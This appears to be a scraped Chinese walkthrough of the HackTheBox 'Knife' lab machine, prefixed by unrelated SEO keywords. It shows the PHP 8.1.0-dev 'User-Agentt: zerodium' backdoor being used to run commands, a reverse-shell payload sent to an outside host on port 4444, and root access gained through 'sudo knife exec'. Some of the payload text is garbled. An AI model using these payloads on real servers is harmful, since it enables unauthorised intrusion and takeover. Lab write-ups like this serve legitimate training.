外贸公司网站搭建,礼品网站建设,微信官方网址,退役军人事务部网站建设Knife 测试过程 1 信息收集
端口扫描 80端口测试
echo 10.129.63.56 knife.htb | sudo tee -a /etc/hosts网站是纯静态的#xff0c;无任何交互功能#xff0c;检查网页源代码也未发现任何可利用的文件。 检查页面请求时#xff0c;请求与响应内容#xff0… Knife 测试过程 1 信息收集
端口扫描 80端口测试
echo 10.129.63.56 knife.htb | sudo tee -a /etc/hosts网站是纯静态的无任何交互功能检查网页源代码也未发现任何可利用的文件。 检查页面请求时请求与响应内容在响应头中发现 X-Powered-By 的参数为PHP/8.1.0-dev 搜索 PHP/8.1.0-dev 相关信息可以发现存在 User-Agentt Remote Code Execution 漏洞 ‘User-Agentt’ Remote Code Execution 漏洞利用
点击查看漏洞利用地址
如果字符串以 zerodium 开头可以在 User-Agent 标头中执行 PHP 代码。
User-Agentt: zerodiumsystem(id);写入反弹 shell 命令
User-Agentt: zerodiumsystem(bash -c bash -i /dev/tcp/10.10.16.50/4444 01);权限提升 knife 二进制文件如果可以使用 sudo 权限运行则可以直接提升权限
sudo knife exec -E exec /bin/sh